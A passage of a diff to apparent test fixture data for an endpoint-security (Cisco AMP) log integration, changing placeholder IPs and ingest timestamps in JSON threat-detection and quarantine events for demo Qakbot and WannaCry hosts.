"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010860100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3716,7 +3716,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3766,7 +3766,7 @@ "f5a171c879b90e77861daf19741b373646d791ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3783,8 +3783,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798754652Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "ingested": "2021-12-09T13:35:47.010865400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3806,7 +3806,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3847,7 +3847,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3857,8 +3857,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798756900Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010873400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3878,7 +3878,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3919,7 +3919,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3929,8 +3929,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798759114Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010878900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3950,7 +3950,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4009,7 +4009,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4026,8 +4026,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798761355Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:47.010884200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4049,7 +4049,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -4094,7 +4094,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4104,8 +4104,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798763596Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010889500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -4125,7 +4125,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4166,7 +4166,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4176,8 +4176,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798765999Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010892700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4197,7 +4197,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4242,7 +4242,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4252,8 +4252,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798768257Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010896900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4273,7 +4273,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4323,7 +4323,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4340,8 +4340,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798770474Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 